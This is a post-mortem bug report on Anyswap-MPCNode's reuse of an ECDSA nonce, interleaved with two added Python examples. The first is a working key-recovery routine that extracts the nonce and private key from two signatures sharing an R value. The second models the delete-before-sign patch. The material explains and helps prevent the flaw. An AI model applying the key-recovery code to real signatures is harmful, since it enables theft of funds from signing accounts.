Anyswap-MPCNode Bug Report

July 15, 2021

Bug Description

The Anyswap-MPCNode network produced two distributed ECDSA signatures with the same R value (the same nonce). From those two signatures the attacker recovered the private key of this MPC account and attacked the Router V3 liquidity pool. Details:


The Anyswap MPC network is based on GG20 threshold ECDSA signatures. It is a highly efficient protocol with a non-interactive online phase, allowing Anyswap MPC nodes to participate asynchronously without needing to be online simultaneously. The protocol splits into a preprocessing stage, which carries most of the computation and communication, and an online stage once the message is known, consisting of a single communication round in which each MPC node performs a single scalar multiplication. Anyswap MPC nodes precompute a set of R values and other parameters to speed up distributed signing. As in any ECDSA scheme, each R must be used for at most one signature: two signatures over different messages that share an R leak the nonce and, with it, the private key.
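The following is an added example, not code from the original report or from Anyswap-MPCNode, showing why a repeated R is fatal. It implements textbook single-signer ECDSA on secp256k1 with pure-integer arithmetic (the threshold protocol produces signatures of exactly the same form, so the attack on the output is identical), signs two constructed messages with the same nonce, and recovers the nonce and private key from the two (r, s) pairs. The private key, nonce and messages are constructed values; the public key is assumed known, which holds for an Ethereum account because it is recoverable from any of its on-chain signatures.

```python
import hashlib

# secp256k1 domain parameters (the curve used by Ethereum accounts).
P = 2**256 - 2**32 - 977
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)


def inv(a, m):
    return pow(a, -1, m)


def ec_add(p, q):
    """Affine point addition on secp256k1; None is the point at infinity."""
    if p is None:
        return q
    if q is None:
        return p
    x1, y1 = p
    x2, y2 = q
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if p == q:
        lam = 3 * x1 * x1 * inv(2 * y1, P) % P
    else:
        lam = (y2 - y1) * inv(x2 - x1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def ec_mul(k, p):
    """Double-and-add scalar multiplication (not constant-time; demo only)."""
    acc = None
    while k:
        if k & 1:
            acc = ec_add(acc, p)
        p = ec_add(p, p)
        k >>= 1
    return acc


def hash_msg(msg: bytes) -> int:
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % N


def ecdsa_sign(d, z, k):
    """Textbook ECDSA with a caller-supplied nonce k; reusing k is the bug."""
    r = ec_mul(k, G)[0] % N
    s = inv(k, N) * (z + r * d) % N
    return r, s


def recover_key_from_shared_r(pub, z1, s1, z2, s2, r):
    """Two signatures with equal r over different messages leak k and d:
        s1 - s2 = k^-1 * (z1 - z2)  =>  k = (z1 - z2) / (s1 - s2)
        s1 * k  = z1 + r * d        =>  d = (s1 * k - z1) / r
    Signers often normalise to low-s, which flips the sign of s but not r,
    so both s and N-s are tried and the candidate is checked against pub."""
    for a in (s1, N - s1):
        for b in (s2, N - s2):
            if (a - b) % N == 0:
                continue
            k = (z1 - z2) * inv((a - b) % N, N) % N
            d = (a * k - z1) * inv(r, N) % N
            if ec_mul(d, G) == pub:
                return k, d
    return None


def run_demo():
    # Constructed key and nonce; nothing here is a real Anyswap value.
    d = hash_msg(b"MPC account private key (constructed, not real)")
    k = hash_msg(b"precomputed R nonce reused after restart (constructed)")
    pub = ec_mul(d, G)
    z1 = hash_msg(b"router v3 cross-chain tx A (constructed)")
    z2 = hash_msg(b"router v3 cross-chain tx B (constructed)")
    r1, s1 = ecdsa_sign(d, z1, k)
    r2, s2 = ecdsa_sign(d, z2, k)
    k_rec, d_rec = recover_key_from_shared_r(pub, z1, s1, z2, s2, r1)
    return {"same_r": r1 == r2, "nonce_recovered": k_rec == k, "key_recovered": d_rec == d}


if __name__ == "__main__":
    print(run_demo())
```

An attacker needs only the two on-chain signatures and their message hashes; no interaction with the MPC nodes is required, which is why the leak cannot be contained once both transactions are public.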

Bug analysis

A customized testnet was built to reproduce this bug with 100% reliability. The root cause is a new patch to the MPCNode code that Router V3 uses. Anyswap Bridge V1/V2 run the old version, so V1/V2 do not have this problem.

Details: about a month ago (at the time of the second transaction signed with the repeated R), a new version of the MPC node code was deployed for Anyswap Router V3. When the MPC nodes restarted, they reloaded the already-used R values from the database into memory. The used R data should have been deleted after signing, but the deletion failed. A new cross-chain transaction was then signed with a used R, which caused the bug.

This is a very low-probability bug. It requires that the MPC nodes fail to delete a used R from the database, and that all nodes then restart and reload that same R.

Bug Solution

Two patches were added to fix this bug.

1. Revert commit f3cabbe so that a restarting MPC node does not reload already-used R values.

2. Delete R from the DB before signing, instead of after.

The patches have been tested on the testnet; the duplicate-R signature bug is resolved.
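The following is an added model of the second patch's ordering argument; it is not Anyswap-MPCNode's code and does not reproduce its database layout. An in-memory sqlite table stands in for a node's on-disk nonce store and a Python list for the copy a node loads at startup; R values are plain integer labels, since only the order of "delete from DB" relative to "use in a signature" matters here. The post-signing cleanup failure described in the report is modelled as an exception raised after the signature is emitted.

```python
import sqlite3


class NoncePool:
    """Model of one node's precomputed-R pool (hypothetical, for illustration).

    self.db   : persistent store of unused R values
    self.cache: in-memory copy rebuilt from the DB on every restart
    """

    def __init__(self, delete_before_sign: bool):
        self.delete_before_sign = delete_before_sign
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE nonces (r INTEGER PRIMARY KEY)")
        self.cache = []
        self.signed_with = []  # every R that has gone into a signature

    def preprocess(self, rs):
        """Preprocessing stage: persist a fresh batch of R values."""
        self.db.executemany("INSERT INTO nonces VALUES (?)", [(r,) for r in rs])
        self.db.commit()
        self.restart()

    def restart(self):
        """Node restart: memory is rebuilt from whatever the DB still holds."""
        self.cache = [row[0] for row in self.db.execute("SELECT r FROM nonces ORDER BY r")]

    def _delete(self, r):
        self.db.execute("DELETE FROM nonces WHERE r = ?", (r,))
        self.db.commit()  # must be durable before the R is used

    def sign(self, fail_after_sign=False):
        """Online stage for one message, consuming the next R from the cache."""
        r = self.cache.pop(0)
        if self.delete_before_sign:
            self._delete(r)            # patched order: R is gone before it is used
        self.signed_with.append(r)     # signature emitted with this R
        if fail_after_sign:
            raise RuntimeError("post-sign cleanup failed")  # models the failed delete
        if not self.delete_before_sign:
            self._delete(r)            # original order: delete only after signing
        return r


def simulate(delete_before_sign):
    """Run sign, failed sign, restart, drain; return R values used more than once."""
    pool = NoncePool(delete_before_sign)
    pool.preprocess([101, 102, 103])     # constructed R labels
    pool.sign()
    try:
        pool.sign(fail_after_sign=True)  # cleanup fails after the second signature
    except RuntimeError:
        pass
    pool.restart()                       # all nodes restart and reload the DB
    while pool.cache:
        pool.sign()
    return sorted(r for r in set(pool.signed_with) if pool.signed_with.count(r) > 1)


if __name__ == "__main__":
    print("delete after sign :", simulate(False))
    print("delete before sign:", simulate(True))
```

With the original order the R whose cleanup failed survives the restart and is signed with twice; with delete-before-sign a failed cleanup only wastes that R, which is the right trade: a lost nonce costs one preprocessing run, a reused nonce costs the key. The delete must be committed to durable storage before the online round starts, and every node holding a share of that R must apply the same rule.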

